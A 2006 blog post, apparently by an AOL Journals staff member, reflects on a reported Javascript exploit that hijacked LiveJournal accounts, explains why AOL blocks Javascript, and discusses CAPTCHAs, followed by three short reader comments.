Friday, January 20, 2006

This Is Still Not Schadenfreude

Okay, so this next entry is still not an example of Schadenfreude. It might be slightly self-serving, because it shows that everyone has problems, but it's not Schadenfreude.

Brian Krebs, computer security blogger for the Washington Post (there's that name again), blogged about a security problem at over at blog provider LiveJournal.

By "security problem", we're talking about a hacker group (or is it "cracker" -- I'm never sure these days, it's like the whole "Trekkie" or "Trekker" thing) claiming to have hijacked more than 900,000 LiveJournal accounts by exploiting a Javascript hole.

You can check out the entry for more details.

Now, whenever I ask the Journals tech folks why AOL Journals doesn't let users use Javascript, they say "Because of security concerns." As the article mentions, similar Javascript exploits have been used on Xanga and MySpace. So I guess this is the kind of thing they're talking about -- if I were them, I would probably be all up in my face, saying, "See, I told [me] so!"

This is not to say that anything can ever be completely bulletproofed. One of the keys to security -- any kind of security, offline or offline -- is managing the balance between protection and convenience. For example, you could design a security system that's so effective and so cumbersome that no one -- including legitimate users -- would use it.

Another takeaway from the article involves CAPTCHAs, those swirly pictures of letters and numbers that are hard for computers to read, and slightly-less hard for humans to read.

The theory behind CAPTCHAs is that you have to complete the test to prove you're human -- this is to stymie automated software robots (or bots), used from everything from creating spam blogs, to leaving spam comments, to sending spam, to hacking user accounts so that they can be used to send spam (notice a trend?).

As I've said before, CAPTCHAs are not bulletproof either, but to date, they have been pretty effective (if annoying), so this is just another example of the ongoing race of security measures and countermeasures.

Thanks -- Joe

3 comments:

Anonymous said...

cool beans Joe
nat

Anonymous said...

LiveJournal does not allow Javascript. I know because I have an LJ and can't add some things I wanted, like Moon Phases.

Capchas might work fairly well, but they're unusable by visually impaired and blind bloggers.

There's always a downside to every upside.

Anonymous said...

Use whatever influence that you have there to see that AOL doesn't use CAPTCHA... I have enough trouble reading what I write, let alone THAT nonsense.